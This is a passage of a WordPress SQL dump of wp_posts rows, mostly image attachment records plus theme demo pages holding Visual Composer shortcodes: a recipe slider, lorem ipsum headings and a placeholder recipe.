14:49:19','','shutterstock_677295580bc','','inherit','open','closed','','shutterstock_677295580bc','','','2018-03-01 14:49:19','2018-03-01 14:49:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/shutterstock_677295580bc.png',0,'attachment','image/png',0),(3736,1,'2018-03-01 15:54:14','2018-03-01 15:54:14','','papaja2','','inherit','open','closed','','papaja2','','','2018-03-01 15:54:14','2018-03-01 15:54:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/papaja2.png',0,'attachment','image/png',0),(3757,1,'2018-03-02 09:43:55','2018-03-02 09:43:55','','sh-single-landing','','inherit','open','closed','','sh-single-landing','','','2018-03-02 09:43:55','2018-03-02 09:43:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/sh-single-landing.png',0,'attachment','image/png',0),(3772,1,'2018-03-02 14:23:12','2018-03-02 14:23:12','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521115630505{padding-bottom: 124px !important;}\"][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"4\" category=\"nature\"][/vc_column][/vc_row]','Recipe Slider','','publish','closed','closed','','recipe-slider','','','2018-03-02 14:23:12','2018-03-02 14:23:12','',0,'http://succulents.select-themes.com/?page_id=3772',0,'page','',0),(3776,1,'2018-03-02 14:50:41','2018-03-02 14:50:41','','Recipe List','','publish','closed','closed','','recipe-list','','','2020-04-23 23:11:18','2020-04-23 23:11:18','',0,'http://succulents.select-themes.com/?page_id=3776',0,'page','',0),(3778,1,'2018-03-02 15:05:30','2018-03-02 15:05:30','','home-10','','inherit','open','closed','','home-10-2','','','2018-03-02 15:05:30','2018-03-02 15:05:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/home-10.png',0,'attachment','image/png',0),(3779,1,'2018-03-02 15:14:35','2018-03-02 15:14:35','[vc_row row_content_width=\"grid\" css=\".vc_custom_1520421074048{padding-top: 85px !important;padding-bottom: 130px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\n\n**You can use tapioca or cornstarch instead.\n\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Recipe','','publish','closed','closed','','recipe','','','2018-03-02 15:14:35','2018-03-02 15:14:35','',1336,'http://succulents.select-themes.com/?page_id=3779',0,'page','',0),(3901,1,'2018-03-05 10:29:27','2018-03-05 10:29:27','','recipe-img-4','','inherit','open','closed','','recipe-img-4','','','2018-03-05 10:29:27','2018-03-05 10:29:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/recipe-img-4.jpg',0,'attachment','image/jpeg',0),(3935,1,'2020-04-07 13:34:52','2020-04-07 13:34:52','','orange-banana-ready-1300-x-1945-1','','inherit','open','closed','','orange-banana-ready-1300-x-1945-1','','','2020-04-07 13:35:05','2020-04-07 13:35:05','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/orange-banana-ready-1300-x-1945-1.jpg',0,'attachment','image/jpeg',0),(3936,1,'2018-03-05 12:56:29','2018-03-05 12:56:29','','blog-recipe-5','','inherit','open','closed','','blog-recipe-5','','','2018-03-05 12:56:29','2018-03-05 12:56:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-recipe-5.jpg',0,'attachment','image/jpeg',0),(3937,1,'2018-03-05 12:56:31','2018-03-05 12:56:31','','blog-recipe-6','','inherit','open','closed','','blog-recipe-6','','','2018-03-05 12:56:31','2018-03-05 12:56:31','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-recipe-6.jpg',0,'attachment','image/jpeg',0),(3941,1,'2020-04-07 12:56:52','2020-04-07 12:56:52','','fish-1300x1943-1','','inherit','open','closed','','fish-1300x1943-1','','','2020-04-07 12:56:59','2020-04-07 12:56:59','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/fish-1300x1943-1.jpg',0,'attachment','image/jpeg',0),(3943,1,'2020-04-07 12:55:41','2020-04-07 12:55:41','','drink-ornage-new-website-1','','inherit','open','closed','','drink-ornage-new-website-1','','','2020-04-07 12:55:51','2020-04-07 12:55:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/drink-ornage-new-website-1.jpg',0,'attachment','image/jpeg',0),(3944,1,'2020-04-06 17:24:14','2020-04-06 17:24:14','','recipe-website','','inherit','open','closed','','recipe-website','','','2020-04-06 17:24:27','2020-04-06 17:24:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/recipe-website.jpg',0,'attachment','image/jpeg',0),(3951,1,'2020-04-06 18:11:02','2020-04-06 18:11:02','','recipe-web2','','inherit','open','closed','','recipe-web2','','','2020-04-06 18:11:41','2020-04-06 18:11:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/recipe-web2.jpg',0,'attachment','image/jpeg',0),(3952,1,'2020-04-06 18:32:09','2020-04-06 18:32:09','','sallad-recipe-new','','inherit','open','closed','','sallad-recipe-new','','','2020-04-06 18:33:08','2020-04-06 18:33:08','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/sallad-recipe-new.jpg',0,'attachment','image/jpeg',0),(3953,1,'2020-04-06 18:23:18','2020-04-06 18:23:18','','drink-ornage-new-website','','inherit','open','closed','','drink-ornage-new-website','','','2020-04-06 18:23:34','2020-04-06 18:23:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/drink-ornage-new-website.jpg',0,'attachment','image/jpeg',0),(3969,1,'2018-03-05 15:28:56','2018-03-05 15:28:56','','landing-home-8','','inherit','open','closed','','landing-home-8','','','2018-03-05 15:28:56','2018-03-05 15:28:56','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home-8.jpg',0,'attachment','image/jpeg',0),(3973,1,'2018-03-05 15:33:02','2018-03-05 15:33:02','','landing-home-6','','inherit','open','closed','','landing-home-6','','','2018-03-05 15:33:02','2018-03-05 15:33:02','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home-6.jpg',0,'attachment','image/jpeg',0),(4029,1,'2018-03-06 08:42:27','2018-03-06 08:42:27','','landing-what-we-do','','inherit','open','closed','','landing-what-we-do','','','2018-03-06 08:42:27','2018-03-06 08:42:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-what-we-do.jpg',0,'attachment','image/jpeg',0),(4048,1,'2018-03-06 10:56:22','2018-03-06 10:56:22','','h4-portfolio-img-12','','inherit','open','closed','','h4-portfolio-img-12','','','2018-03-06 10:56:22','2018-03-06 10:56:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-portfolio-img-12.jpg',0,'attachment','image/jpeg',0),(4049,1,'2018-03-06 11:29:44','2018-03-06 11:29:44','','h4-img-14','','inherit','open','closed','','h4-img-14','','','2018-03-06 11:29:44','2018-03-06 11:29:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h4-img-14.jpg',0,'attachment','image/jpeg',0),(4076,1,'2018-03-06 14:09:03','2018-03-06 14:09:03','','landing-background-leaves-4','','inherit','open','closed','','landing-background-leaves-4','','','2018-03-06 14:09:03','2018-03-06 14:09:03','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-background-leaves-4.jpg',0,'attachment','image/jpeg',0),(4108,1,'2018-03-07 10:22:10','2018-03-07 10:22:10','','h5-tabs-img-1','','inherit','open','closed','','h5-tabs-img-1-2','','','2018-03-07 10:22:10','2018-03-07 10:22:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h5-tabs-img-1.png',0,'attachment','image/png',0),(4109,1,'2018-03-07 10:22:35','2018-03-07 10:22:35','','h5-tabs-img-2','','inherit','open','closed','','h5-tabs-img-2','','','2018-03-07 10:22:35','2018-03-07 10:22:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h5-tabs-img-2.png',0,'attachment','image/png',0),(4110,1,'2018-03-07 10:23:00','2018-03-07 10:23:00','','h5-tabs-img-3','','inherit','open','closed','','h5-tabs-img-3','','','2018-03-07 10:23:00','2018-03-07 10:23:00','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h5-tabs-img-3.png',0,'attachment','image/png',0),(4111,1,'2018-03-07 10:23:25','2018-03-07 10:23:25','','h5-tabs-img-4','','inherit','open','closed','','h5-tabs-img-4','','','2018-03-07 10:23:25','2018-03-07 10:23:25','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h5-tabs-img-4.png',0,'attachment','image/png',0),(4112,1,'2018-03-07 10:23:49','2018-03-07 10:23:49','','h5-tabs-img-5','','inherit','open','closed','','h5-tabs-img-5','','','2018-03-07 10:23:49','2018-03-07 10:23:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h5-tabs-img-5.png',0,'attachment','image/png',0),(4113,1,'2018-03-07 10:24:13','2018-03-07 10:24:13','','h5-tabs-img-6','','inherit','open','closed','','h5-tabs-img-6','','','2018-03-07 10:24:13','2018-03-07 10:24:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h5-tabs-img-6.png',0,'attachment','image/png',0),(4125,1,'2018-03-07 11:30:59','2018-03-07 11:30:59','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521032927826{padding-top: 19px !important;padding-bottom: 15px !important;}\"][vc_column][vc_column_text]\n

Heading 1

\n[/vc_column_text][vc_empty_space height=\"15px\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis dolore te feugait nulla facilisi. Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis dolore te feugait nulla facilisi. Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1520426337327{padding-top: 0px !important;padding-bottom: 23px !important;}\"][vc_column][vc_column_text]\n

Heading 2

\n[/vc_column_text][vc_empty_space height=\"11px\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text]Duis aut veli eum iriure dolor loremi inumus hend rerit inumus vulputate velit esse molestie consequa, velillu dolore eu feugiat nulla facil isis atve eros eamea lore. Feugiat nulla faci.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis  facilisi. Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod nulla.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text]Duis aut veli eum iriure dolor loremi inumus hend rerit inumus vulputate velit esse molestie consequa, velillu dolore eu feugiat nulla facil isis atve eros eamea lore. Feugiat nulla faci.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1520426345152{padding-top: 0px !important;padding-bottom: 25px !important;}\"][vc_column][vc_column_text]\n

Heading 3

\n[/vc_column_text][vc_empty_space height=\"9px\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vul tate velit esse molestie consequa vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vul tate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vul tate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1520426356665{padding-top: 0px !important;padding-bottom: 28px !important;}\"][vc_column][vc_column_text]\n

Heading 4

\n[/vc_column_text][vc_empty_space height=\"9px\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text]Duis aut veli eum iriure dolor loremi inumus hend rerit inumus vulputate velit esse molestie, velillu dolore eu feugiat nulla facil isis atve eros eamea lore. Feugiat nulla faci.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text]Duis aut veli eum iriure dolor loremi inumus hend rerit inumus vulputate velit esse molestie, velillu dolore eu feugiat nulla facil isis atve eros eamea lore. Feugiat nulla faci.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text]Duis aut veli eum iriure dolor loremi inumus hend rerit inumus vulputate velit esse molestie, velillu dolore eu feugiat nulla facil isis atve eros eamea lore. Feugiat nulla faci.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text]Duis aut veli eum iriure dolor loremi inumus hend rerit inumus vulputate velit esse molestie, velillu dolore eu feugiat nulla facil isis atve eros eamea lore. Feugiat nulla faci.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1520426364753{padding-bottom: 32px !important;}\"][vc_column][vc_column_text]\n
Heading 5
\n[/vc_column_text][vc_empty_space height=\"9px\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis dolore te feugait nulla facilisi. Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis dolore te feugait nulla facilisi. Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521032941280{padding-top: 0px !important;padding-bottom: 83px !important;}\"][vc_column][vc_column_text]\n
HEADING 6
\n[/vc_column_text][vc_empty_space height=\"9px\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text]Duis aut veli eum iriure dolor loremi inumus hend rerit inumus vulputate velit esse molestie, velillu dolore eu feugiat nulla facil isis atve eros eamea lore. Feugiat nulla faci.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][vc_column_inner width=\"3/4\"][vc_column_text]Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequa, vel illum dolore eu feugiat nulla facilisis at vero eros decore eam ea. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis dolore te feugait nulla facilisi. Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod. Feugiat nulla facilisis at vero eros est usus legentis in iis qui facit eorum augue duis dolore te feugait nulla facilisi. Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod.[/vc_column_text][vc_empty_space height=\"10px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Headings','','publish','closed','closed','','heading','','','2018-03-07 11:30:59','2018-03-07 11:30:59','',1336,'http://succulents.select-themes.com/?page_id=4125',0,'page','',0),(4178,1,'2018-03-07 14:54:07','2018-03-07 14:54:07','','landing-about-us-1','','inherit','open','closed','','landing-about-us-1','','','2018-03-07 14:54:07','2018-03-07 14:54:07','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-about-us-1.jpg',0,'attachment','image/jpeg',0),(4179,1,'2018-03-07 14:54:09','2018-03-07 14:54:09','','landing-coming-soon-1','','inherit','open','closed','','landing-coming-soon-1','','','2018-03-07 14:54:09','2018-03-07 14:54:09','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-coming-soon-1.jpg',0,'attachment','image/jpeg',0),(4180,1,'2018-03-07 14:54:10','2018-03-07 14:54:10','','landing-contact-us-1','','inherit','open','closed','','landing-contact-us-1','','','2018-03-07 14:54:10','2018-03-07 14:54:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-contact-us-1.jpg',0,'attachment','image/jpeg',0),(4181,1,'2018-03-07 14:54:12','2018-03-07 14:54:12','','landing-our-team-1','','inherit','open','closed','','landing-our-team-1','','','2018-03-07 14:54:12','2018-03-07 14:54:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-our-team-1.jpg',0,'attachment','image/jpeg',0),(4187,1,'2018-03-07 15:49:50','2018-03-07 15:49:50','','nova-vocka','','inherit','open','closed','','nova-vocka','','','2018-03-07 15:49:50','2018-03-07 15:49:50','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/nova-vocka.png',0,'attachment','image/png',0),(4188,1,'2018-03-08 08:45:02','2018-03-08 08:45:02','','landing-pricing-plans-1','','inherit','open','closed','','landing-pricing-plans-1','','','2018-03-08 08:45:02','2018-03-08 08:45:02','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-pricing-plans-1.jpg',0,'attachment','image/jpeg',0),(4189,1,'2018-03-08 08:45:04','2018-03-08 08:45:04','','landing-what-we-offer-1','','inherit','open','closed','','landing-what-we-offer-1','','','2018-03-08 08:45:04','2018-03-08 08:45:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-what-we-offer-1.jpg',0,'attachment','image/jpeg',0),(4190,1,'2018-03-08 08:45:04','2018-03-08 08:45:04','','landing-what-we-offer-1','','inherit','open','closed','','landing-what-we-offer-1-2','','','2018-03-08 08:45:04','2018-03-08 08:45:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-what-we-offer-1-1.jpg',0,'attachment','image/jpeg',0),(4191,1,'2018-01-19 10:10:47','2018-01-19 10:10:47','','tabs-background','','inherit','open','closed','','tabs-background-2','','','2018-01-19 10:10:47','2018-01-19 10:10:47','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/tabs-background-2.jpg',0,'attachment','image/jpeg',0),(4192,1,'2018-01-19 10:10:47','2018-01-19 10:10:47','','tabs-background','','inherit','open','closed','','tabs-background-3','','','2018-01-19 10:10:47','2018-01-19 10:10:47','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/tabs-background.jpg',0,'attachment','image/jpeg',0),(4206,1,'2018-03-08 14:02:34','2018-03-08 14:02:34','','ruze','','inherit','open','closed','','ruze','','','2018-03-08 14:02:34','2018-03-08 14:02:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/ruze.png',0,'attachment','image/png',0),(4207,1,'2018-03-08 14:02:34','2018-03-08 14:02:34','','ruze','','inherit','open','closed','','ruze-2','','','2018-03-08 14:02:34','2018-03-08 14:02:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/ruze-1.png',0,'attachment','image/png',0),(4208,1,'2018-03-08 14:21:45','2018-03-08 14:21:45','','h4-slide1-graphic2-1','','inherit','open','closed','','h4-slide1-graphic2-1','','','2018-03-08 14:21:45','2018-03-08 14:21:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h4-slide1-graphic2-1.png',0,'attachment','image/png',0),(4209,1,'2018-03-08 14:21:45','2018-03-08 14:21:45','','h4-slide1-graphic2-1','','inherit','open','closed','','h4-slide1-graphic2-1-2','','','2018-03-08 14:21:45','2018-03-08 14:21:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h4-slide1-graphic2-1-1.png',0,'attachment','image/png',0),(4211,1,'2018-03-08 15:27:58','2018-03-08 15:27:58','','landing-home12-img1','','inherit','open','closed','','landing-home12-img1','','','2018-03-08 15:27:58','2018-03-08 15:27:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home12-img1.jpg',0,'attachment','image/jpeg',0),(4225,1,'2018-03-09 09:47:06','2018-03-09 09:47:06','','h1-slide1','','inherit','open','closed','','h1-slide1','','','2018-03-09 09:47:06','2018-03-09 09:47:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h1-slide1.png',0,'attachment','image/png',0),(4228,1,'2018-03-09 10:53:49','2018-03-09 10:53:49','','favicon-img-1','','inherit','open','closed','','favicon-img-1','','','2018-03-09 10:53:49','2018-03-09 10:53:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/favicon-img-1.png',0,'attachment','image/png',0),(4229,1,'2018-01-19 10:32:45','2018-01-19 10:32:45','','h1-img1','','inherit','open','closed','','h1-img1-2','','','2018-01-19 10:32:45','2018-01-19 10:32:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img1-1.png',0,'attachment','image/png',0),(4230,1,'2018-01-19 10:35:10','2018-01-19 10:35:10','','h1-img2','','inherit','open','closed','','h1-img2-2','','','2018-01-19 10:35:10','2018-01-19 10:35:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img2.png',0,'attachment','image/png',0),(4231,1,'2018-01-19 11:05:16','2018-01-19 11:05:16','','about-us-gallery-img-1','','inherit','open','closed','','about-us-gallery-img-1-2','','','2018-01-19 11:05:16','2018-01-19 11:05:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-1.jpg',0,'attachment','image/jpeg',0),(4232,1,'2018-03-09 10:53:58','2018-03-09 10:53:58','http://tummyrevolution.com/wp-content/uploads/2018/03/cropped-favicon-img-1.png','cropped-favicon-img-1.png','','inherit','open','closed','','cropped-favicon-img-1-png','','','2018-03-09 10:53:58','2018-03-09 10:53:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/cropped-favicon-img-1.png',0,'attachment','image/png',0),(4233,1,'2018-01-19 11:05:24','2018-01-19 11:05:24','','about-us-gallery-img-2','','inherit','open','closed','','about-us-gallery-img-2-2','','','2018-01-19 11:05:24','2018-01-19 11:05:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-2.jpg',0,'attachment','image/jpeg',0),(4234,1,'2018-03-09 11:10:51','2018-03-09 11:10:51','','landing-home1-img-1','','inherit','open','closed','','landing-home1-img-1','','','2018-03-09 11:10:51','2018-03-09 11:10:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home1-img-1.jpg',0,'attachment','image/jpeg',0),(4235,1,'2018-01-29 10:52:46','2018-01-29 10:52:46','','product4-gallery3','','inherit','open','closed','','product4-gallery3-2','','','2018-01-29 10:52:46','2018-01-29 10:52:46','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product4-gallery3-1.jpg',0,'attachment','image/jpeg',0),(4236,1,'2018-01-19 11:05:29','2018-01-19 11:05:29','','about-us-gallery-img-3','','inherit','open','closed','','about-us-gallery-img-3-2','','','2018-01-19 11:05:29','2018-01-19 11:05:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-3-1.jpg',0,'attachment','image/jpeg',0),(4237,1,'2018-01-19 11:06:53','2018-01-19 11:06:53','','about-us-gallery-img-5','','inherit','open','closed','','about-us-gallery-img-5-2','','','2018-01-19 11:06:53','2018-01-19 11:06:53','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-5-1.jpg',0,'attachment','image/jpeg',0),(4238,1,'2018-03-09 11:11:22','2018-03-09 11:11:22','','landing-home2-img-1','','inherit','open','closed','','landing-home2-img-1','','','2018-03-09 11:11:22','2018-03-09 11:11:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home2-img-1.jpg',0,'attachment','image/jpeg',0),(4239,1,'2018-03-09 11:11:22','2018-03-09 11:11:22','','landing-home2-img-1','','inherit','open','closed','','landing-home2-img-1-2','','','2018-03-09 11:11:22','2018-03-09 11:11:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home2-img-1-1.jpg',0,'attachment','image/jpeg',0),(4240,1,'2018-01-25 10:12:49','2018-01-25 10:12:49','','h5-slider-graphic-2','','inherit','open','closed','','h5-slider-graphic-2-2','','','2018-01-25 10:12:49','2018-01-25 10:12:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-slider-graphic-2-1.jpg',0,'attachment','image/jpeg',0),(4241,1,'2018-03-09 11:15:10','2018-03-09 11:15:10','','landing-home3-img-1','','inherit','open','closed','','landing-home3-img-1','','','2018-03-09 11:15:10','2018-03-09 11:15:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home3-img-1.jpg',0,'attachment','image/jpeg',0),(4242,1,'2018-03-09 11:16:01','2018-03-09 11:16:01','','landing-home5-img-1','','inherit','open','closed','','landing-home5-img-1','','','2018-03-09 11:16:01','2018-03-09 11:16:01','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home5-img-1.jpg',0,'attachment','image/jpeg',0),(4243,1,'2018-03-09 13:11:29','2018-03-09 13:11:29','','landing-home8-img-1','','inherit','open','closed','','landing-home8-img-1','','','2018-03-09 13:11:29','2018-03-09 13:11:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home8-img-1.jpg',0,'attachment','image/jpeg',0),(4244,1,'2018-03-09 13:12:34','2018-03-09 13:12:34','','landing-home10-img-1','','inherit','open','closed','','landing-home10-img-1','','','2018-03-09 13:12:34','2018-03-09 13:12:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home10-img-1.jpg',0,'attachment','image/jpeg',0),(4245,1,'2018-02-06 13:38:14','2018-02-06 13:38:14','','h1-img-2','','inherit','open','closed','','h1-img-2-2','','','2018-02-06 13:38:14','2018-02-06 13:38:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-img-2-1.png',0,'attachment','image/png',0),(4246,1,'2018-02-06 13:38:15','2018-02-06 13:38:15','','h1-img-3','','inherit','open','closed','','h1-img-3-2','','','2018-02-06 13:38:15','2018-02-06 13:38:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-img-3.png',0,'attachment','image/png',0),(4247,1,'2018-02-22 13:52:38','2018-02-22 13:52:38','','pricing-img-9','','inherit','open','closed','','pricing-img-9-2','','','2018-02-22 13:52:38','2018-02-22 